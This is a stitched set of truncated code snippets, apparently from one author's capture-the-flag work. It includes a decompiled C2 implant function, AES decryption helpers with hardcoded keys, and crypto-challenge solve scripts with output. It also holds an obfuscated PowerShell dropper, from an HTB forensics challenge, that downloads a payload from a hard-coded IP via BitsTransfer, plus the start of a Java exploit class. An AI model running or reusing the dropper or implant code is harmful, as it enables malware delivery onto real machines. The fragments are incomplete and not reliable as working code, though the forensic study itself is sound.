khr0x40sh

// Program
// Token: 0x06000017 RID: 23 RVA: 0x00002CDC File Offset: 0x00000EDC
private static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
{
	Program.UrlGen.Init(stringURLS, RandomURI, baseURL);
	Program.ImgGen.Init(stringIMGS);
	Program.pKey = Key;
	int num = 5;
	Regex regex = new Regex("(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase | RegexOptions.Compiled);
	Match match = regex.Match(Sleep);

khr0x40sh

import base64
from Crypto.Cipher import AES


### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
def decrypt(data, key):
    cipher = AES.new(key, AES.MODE_CBC, data[:AES.block_size])
    return cipher.decrypt(data[AES.block_size:])

key = base64.b64decode("DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=")

khr0x40sh

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
def decrypt(data, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(data[0:]), AES.block_size)

key = [0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0]
iv = [0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1]

khr0x40sh

#Sample ps1 dropper from HTB:CA2023 Forensics Interstellar C2 challenge. DO NOT EXECUTE! USE OF THIS IS AT YOUR OWN RISK!
  .("{1}{0}{2}" -f'T','Set-i','em') ('vAriA'+'ble'+':q'+'L'+'z0so')  ( [tYpe]("{0}{1}{2}{3}" -F'SySTEM.i','o.Fi','lE','mode')) ;  &("{0}{2}{1}" -f'set-Vari','E','ABL') l60Yu3  ( [tYPe]("{7}{0}{5}{4}{3}{1}{2}{6}"-F'm.','ph','Y.ae','A','TY.crypTOgR','SeCuRi','S','sYSte'));  .("{0}{2}{1}{3}" -f 'Set-V','i','AR','aBle')  BI34  (  [TyPE]("{4}{7}{0}{1}{3}{2}{8}{5}{10}{6}{9}" -f 'TEm.secU','R','Y.CrY','IT','s','Y.','D','yS','pTogrAPH','E','CrypTOSTReAmmo'));  ${U`Rl} = ("{0}{4}{1}{5}{8}{6}{2}{7}{9}{3}"-f 'htt','4f0','53-41ab-938','d8e51','p://64.226.84.200/9497','8','58','a-ae1bd8','-','6')
${P`TF} = "$env:temp\94974f08-5853-41ab-938a-ae1bd86d8e51"
.("{2}{1}{3}{0}"-f'ule','M','Import-','od') ("{2}{0}{3}{1}"-f 'r','fer','BitsT','ans')
.("{4}{5}{3}{1}{2}{0}"-f'r','-BitsT','ransfe','t','S','tar') -Source ${u`Rl} -Destination ${p`Tf}
${Fs} = &("{1}{0}{2}" -f 'w-Ob','Ne','ject') ("{1}{2}{0}"-f 'eam','

khr0x40sh

$encoding = New-Object System.Text.AsciiEncoding

[System.Net.Sockets.TcpClient] $tcpClient = [System.Net.Sockets.TcpClient]::new("pwnme.maveris.fun", "8888")

$tcpStream = $tcpClient.GetStream()
[System.IO.BinaryReader] $reader = [System.IO.BinaryReader]::new($tcpStream)
[System.IO.BinaryWriter] $writer = [System.IO.BinaryWriter]::new($tcpStream)
$cli = $false
$auth = $false
$res = @()

khr0x40sh

from Crypto.Util.Padding import pad
from Crypto.Util import Counter
from Crypto.Cipher import AES
import os


class Encryptor:

    def __init__(self):
        self.key = os.urandom(16)

khr0x40sh

from encrypt import Encryptor
from secret import FLAG
import socketserver
import random
import signal
import json

MODES = ['ECB', 'CBC', 'CFB', 'OFB', 'CTR']

khr0x40sh

from pwn import *
import json
import binascii

ip = '127.0.0.1'
port = 1337

r = remote(ip, port)

while True:

khr0x40sh

crypto_whole_lotta_candy/solve.py
[x] Opening connection to 127.0.0.1 on port 1337
[x] Opening connection to 127.0.0.1 on port 1337: Trying 127.0.0.1
[+] Opening connection to 127.0.0.1 on port 1337: Done
Please interact with the server using json data!
Selected mode is ECB.

Options:

1.Encrypt flag

khr0x40sh

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class YuleLogExploit {

        public YuleLogExploit() throws Exception {

                String cmd;